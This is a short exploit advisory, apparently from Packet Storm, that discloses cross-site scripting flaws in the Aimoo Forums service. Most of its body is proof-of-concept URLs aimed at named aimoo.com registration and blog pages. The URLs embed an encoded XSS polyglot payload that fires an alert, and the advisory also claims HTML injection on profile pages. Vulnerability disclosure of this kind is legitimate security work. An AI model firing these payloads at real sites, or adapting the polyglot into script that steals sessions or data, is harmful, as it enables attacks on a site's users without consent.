Aimoo Forums suffers from a cross site scripting vulnerability.
9a82b59ebdfae744d42e239c1cc6f1474011e6ac92852d1dd2ad652c0aca6fcd# Exploit Title: Aimoo Forums Cross Site Scripting
# Date: 25.01.2012
# Author: Sony
# Software Link: http://www.aimoo.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/aimoo-forums-cross-site-scripting.html
..................................................................
We have xss in the registration page:
http://www.aimoo.com/CommunityName-%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E/Create.html
Also in the blog page:
http://zone.aimoo.com/blog/administrator/List/0/1%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
And in the profile page we have html code injection:
http://profile.aimoo.com/neskaju
http://zone.aimoo.com/photo/neskaju
etc..(i think..)
Demo Video:
http://www.youtube.com/watch?v=8EdHWq7LLpY
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed